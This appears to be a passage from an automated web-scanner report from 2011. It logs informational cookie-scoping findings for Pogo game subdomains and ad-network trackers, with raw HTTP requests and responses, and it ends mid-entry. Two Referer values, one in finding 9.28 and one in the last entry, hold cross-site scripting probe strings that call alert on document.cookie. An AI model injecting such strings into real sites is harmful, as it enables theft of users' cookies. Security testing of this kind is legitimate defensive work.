Location: http://card-games.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fcard-games.pogo.com%2Fgames%2Frainy-day-spider-solitaire
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:06:35 GMT
Server: Apache-Coyote/1.1

9.24. http://click.linksynergy.com/fs-bin/stat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/stat

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsn_statp=FAJFJR4AAAAW5BfG5xryCg%3D%3D; Domain=.linksynergy.com; Expires=Sat, 04-Jan-2031 02:07:10 GMT; Path=/
lsn_qstring=FLenzF8lvbI%3A146261%3A; Domain=.linksynergy.com; Expires=Mon, 10-Jan-2011 02:07:10 GMT; Path=/
lsn_track=UmFuZG9tSVZz%2FLfL%2BfxkMJigkTOgxt3zHfLpNpk0lNFQF8gd%2BQ2vXz0pvncGUWzpoj69n%2Ber3qdc06h0wR6%2F3g%3D%3D; Domain=.linksynergy.com; Expires=Wed, 06-Jan-2021 02:07:10 GMT; Path=/
lsclick_mid13508="2011-01-09 02:07:10.379|FLenzF8lvbI-jRY9Ep2QlsT7E2gTD46DFg"; Domain=.linksynergy.com; Expires=Tue, 08-Jan-2013 02:07:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs-bin/stat?id=FLenzF8lvbI&offerid=78941&type=3&subid=0&tmpid=1826 HTTP/1.1
Host: click.linksynergy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Set-Cookie: lsn_statp=FAJFJR4AAAAW5BfG5xryCg%3D%3D; Domain=.linksynergy.com; Expires=Sat, 04-Jan-2031 02:07:10 GMT; Path=/
Set-Cookie: lsn_qstring=FLenzF8lvbI%3A146261%3A; Domain=.linksynergy.com; Expires=Mon, 10-Jan-2011 02:07:10 GMT; Path=/
Set-Cookie: lsn_track=UmFuZG9tSVZz%2FLfL%2BfxkMJigkTOgxt3zHfLpNpk0lNFQF8gd%2BQ2vXz0pvncGUWzpoj69n%2Ber3qdc06h0wR6%2F3g%3D%3D; Domain=.linksynergy.com; Expires=Wed, 06-Jan-2021 02:07:10 GMT; Path=/
Set-Cookie: lsclick_mid13508="2011-01-09 02:07:10.379|FLenzF8lvbI-jRY9Ep2QlsT7E2gTD46DFg"; Domain=.linksynergy.com; Expires=Tue, 08-Jan-2013 02:07:10 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Sun, 09 Jan 2011 02:07:09 GMT
Cache-Control: no-cache
Pragma: no-cache
Location: &partnerId=30&siteID=FLenzF8lvbI-jRY9Ep2QlsT7E2gTD46DFg
Content-Type: text/html;charset=UTF-8
Connection: close

<html>
<head>
<title>301 Moved Permanently</title>
</head>
<body>
<p>The page you are requesting has moved to <a href="&partnerId=30&siteID=FLenzF8lvbI-jRY9Ep2QlsT7E2gTD46DFg">&partnerId=30&siteI
...[SNIP]...

9.25. http://clubpogo-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clubpogo-games.pogo.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

prod.JID=0C60C5F9106BE47764E124E1F5A58B30.000385; Domain=.pogo.com; Path=/
com.pogo.unid=6606437090669254; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:07:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: clubpogo-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=0C60C5F9106BE47764E124E1F5A58B30.000385; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606437090669254; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:07:20 GMT; Path=/
Location: http://clubpogo-games.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fclubpogo-games.pogo.com%2F%3Fsite%3Dpogo
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:07:20 GMT
Server: Apache-Coyote/1.1

9.26. http://flash-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://flash-games.pogo.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

prod.JID=DD9ECB5481B20153BB68707C5F4897F5.000067; Domain=.pogo.com; Path=/
com.pogo.unid=6606527284785334; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:14:44 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: flash-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=DD9ECB5481B20153BB68707C5F4897F5.000067; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606527284785334; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:14:44 GMT; Path=/
Location: http://flash-games.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fflash-games.pogo.com%2F%3Fsite%3Dpogo
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:14:43 GMT
Server: Apache-Coyote/1.1

9.27. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4252/4762/6670-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ruid=154d290e46adc1d6f373dd09^2^1294537835^2915161843; expires=Sat, 09-Apr-2011 01:50:35 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
rdk=4252/4762; expires=Sun, 09-Jan-2011 02:50:35 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=4762^3; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=108564; path=/; domain=.rubiconproject.com
csi15=3188204.js^2^1294536315^1294537835; expires=Sun, 16-Jan-2011 01:50:35 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4252/4762/6670-15.js?cb=0.6576983768027276 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?sls=2&site=pogo
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; au=GIP9HWY4-MADS-10.208.38.239; ses15=4762^2; csi15=3188204.js^1^1294536315^1294536315; put_1197=3271971346728586924; ses2=4762^3; csi2=3156581.js^2^1294536526^1294536590&3146355.js^1^1294536507^1294536507; rpb=4210%3D1%264214%3D1%264894%3D1; put_1986=4760492999213801733; cd=false

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:50:35 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=154d290e46adc1d6f373dd09^2^1294537835^2915161843; expires=Sat, 09-Apr-2011 01:50:35 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:50:35 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 02:50:35 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=4762^3; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=108564; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188204.js^2^1294536315^1294537835; expires=Sun, 16-Jan-2011 01:50:35 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2391

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188204"
...[SNIP]...

9.28. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4252/4762/6670-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=4252/4762; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=110084; path=/; domain=.rubiconproject.com
csi15=3188204.js^1^1294536315^1294536315; expires=Sun, 16-Jan-2011 01:25:15 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4252/4762/6670-15.js?cb=0.8619239274412394 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; ses15=4762^1; rpb=4210%3D1; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; cd=false; au=GIP9HWY4-MADS-10.208.38.239

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:25:15 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=110084; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188204.js^1^1294536315^1294536315; expires=Sun, 16-Jan-2011 01:25:15 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2391

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188204"
...[SNIP]...

9.29. http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4252/4762/6942-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ruid=154d290e46adc1d6f373dd09^3^1294539219^2915161843; expires=Sat, 09-Apr-2011 02:13:39 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
rdk=4252/4762; expires=Sun, 09-Jan-2011 03:13:39 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=4762^4; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=107180; path=/; domain=.rubiconproject.com
csi15=3188204.js^3^1294536315^1294539219; expires=Sun, 16-Jan-2011 02:13:39 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4252/4762/6942-15.js?cb=0.041662746109068394 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://board-games.pogo.com/?sl=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; ses2=4762^3; csi2=3156581.js^2^1294536526^1294536590&3146355.js^1^1294536507^1294536507; rpb=4210%3D1%264214%3D1%264894%3D1; put_1986=4760492999213801733; ruid=154d290e46adc1d6f373dd09^2^1294537835^2915161843; ses15=4762^3; csi15=3188204.js^2^1294536315^1294537835; cd=false

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:13:39 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=154d290e46adc1d6f373dd09^3^1294539219^2915161843; expires=Sat, 09-Apr-2011 02:13:39 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:13:39 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 03:13:39 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=4762^4; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=107180; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188204.js^3^1294536315^1294539219; expires=Sun, 16-Jan-2011 02:13:39 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2391

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188204"
...[SNIP]...

9.30. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4252/4762/6942-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=4252/4762; expires=Sun, 09-Jan-2011 02:28:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=4762^1; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=109892; path=/; domain=.rubiconproject.com
csi2=3146355.js^1^1294536507^1294536507; expires=Sun, 16-Jan-2011 01:28:27 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4252/4762/6942-2.js?cb=0.9012418461497873 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/%3Frefid%3Dheadernav_fp_shopmenu
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; au=GIP9HWY4-MADS-10.208.38.239; ses15=4762^2; csi15=3188204.js^1^1294536315^1294536315; rpb=4210%3D1%264214%3D1; put_1197=3271971346728586924; cd=false

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:28:27 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:28:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 09-Jan-2011 02:28:27 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4762^1; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=109892; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3146355.js^1^1294536507^1294536507; expires=Sun, 16-Jan-2011 01:28:27 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2368

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3146355"
...[SNIP]...

9.31. http://puzzle-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://puzzle-games.pogo.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

prod.JID=1A57DDA503E2C81056979F24457357BF.000128; Domain=.pogo.com; Path=/
com.pogo.unid=6606230932049839; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:46 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: puzzle-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=1A57DDA503E2C81056979F24457357BF.000128; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606230932049839; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:46 GMT; Path=/
Location: http://puzzle-games.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fpuzzle-games.pogo.com%2F
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:25:46 GMT
Server: Apache-Coyote/1.1

9.32. http://puzzle-games.pogo.com/games/bejeweled2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://puzzle-games.pogo.com
Path:	/games/bejeweled2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

prod.JID=EADAF0FD3218310E1CEEBA781854D80D.000146; Domain=.pogo.com; Path=/
com.pogo.unid=6606570234467613; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:50 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/bejeweled2 HTTP/1.1
Host: puzzle-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=EADAF0FD3218310E1CEEBA781854D80D.000146; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606570234467613; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:50 GMT; Path=/
Location: http://puzzle-games.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fpuzzle-games.pogo.com%2Fgames%2Fbejeweled2
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:25:49 GMT
Server: Apache-Coyote/1.1

9.33. http://puzzle-games.pogo.com/games/yahtzee-party previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://puzzle-games.pogo.com
Path:	/games/yahtzee-party

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

prod.JID=E4AF788ED2AA6227ABE9A8C3F56D31D0.000290; Domain=.pogo.com; Path=/
com.pogo.unid=6606518694853812; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:49 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/yahtzee-party HTTP/1.1
Host: puzzle-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=E4AF788ED2AA6227ABE9A8C3F56D31D0.000290; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606518694853812; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:49 GMT; Path=/
Location: http://puzzle-games.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fpuzzle-games.pogo.com%2Fgames%2Fyahtzee-party
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:25:49 GMT
Server: Apache-Coyote/1.1

9.34. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm HTTP/1.1
Host: r.turn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=3011330574290390485; rds=undefined%7Cundefined%7Cundefined%7C14983; pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rv=1; rrs=undefined%7Cundefined%7Cundefined%7C4;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:53 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:25:52 GMT
Connection: close

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=7843127134443299479&fpid=&nu=n&t=&
...[SNIP]...

9.35. http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=3yRKNJpwIg02FlBCdbdRZA7gHw8jGHgsjhADgaUKCKCC9mUBwxKkmhUiGgK; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:58 GMT; path=/
52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click
0846642328=_4d290f90,0846642328,758630^906164^1^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328? HTTP/1.1
Host: r1.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; F1=BA5Dp0EBAAAABAAAAEAAgEA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; ACID=Bc330012940999670074; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; ROLL=v5Q2V0cRVUyqcZK!;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 09 Jan 2011 02:25:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: /;ord=0846642328?
Set-Cookie: C2=3yRKNJpwIg02FlBCdbdRZA7gHw8jGHgsjhADgaUKCKCC9mUBwxKkmhUiGgK; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:58 GMT; path=/
Set-Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click
Set-Cookie: 0846642328=_4d290f90,0846642328,758630^906164^1^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 09 Jan 2011 02:25:58 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 142

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f%3bord%3d0846642328%3f">here</a>.</h2>
</body></html>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
